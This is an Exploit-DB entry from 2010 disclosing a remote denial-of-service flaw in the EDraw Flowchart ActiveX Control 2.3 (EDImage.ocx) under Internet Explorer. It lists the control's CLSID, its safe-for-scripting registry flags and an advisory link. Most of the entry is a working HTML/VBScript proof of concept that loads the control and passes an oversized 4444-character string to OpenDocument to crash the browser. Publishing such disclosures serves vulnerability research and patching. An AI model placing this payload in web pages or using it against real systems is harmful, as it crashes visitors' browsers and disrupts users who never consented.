EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)

EDB-ID:

12341

CVE:

N/A

EDB Verified:

Author:

LiquidWorm

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2010-04-22

Vulnerable App: 
######################


 EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)


 Vendor: EdrawSoft - http://www.edrawsoft.com

 Platform Used: MS Win XP Pro SP3 (en) / IE 8.0


 CompanyName		EDrawSoft
 FileDescription	EDraw Flowchart ActiveX Control Module
 FileVersion		2, 3, 0, 6
 InternalName		EDrawSoft
 LegalCopyright		Copyright (C) 2005
 OriginalFileName	EDImage.OCX
 ProductName		EDraw Flowchart ActiveX Control Module
 ProductVersion		2, 3, 0, 6

 Report for Clsid: {F685AFD8-A5CC-410E-98E4-BAA1C559BA61}
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False


 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

 Zero Science Lab - http://www.zeroscience.mk

 liquidworm gmail com



 18.04.2010


 Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4936.php


######################


 <object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='thricer' />
 <script language='vbscript'>

 targetFile = "C:\PROGRA~1\EDIMAG~1\EDImage.ocx"
 prototype  = "Function OpenDocument ( ByVal filename As String ) As Boolean"
 memberName = "OpenDocument"
 progid     = "EDIMAGELib.EDImage"
 argCount   = 1

 arg1=String(4444, "J")

 thricer.OpenDocument arg1 

 </script>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services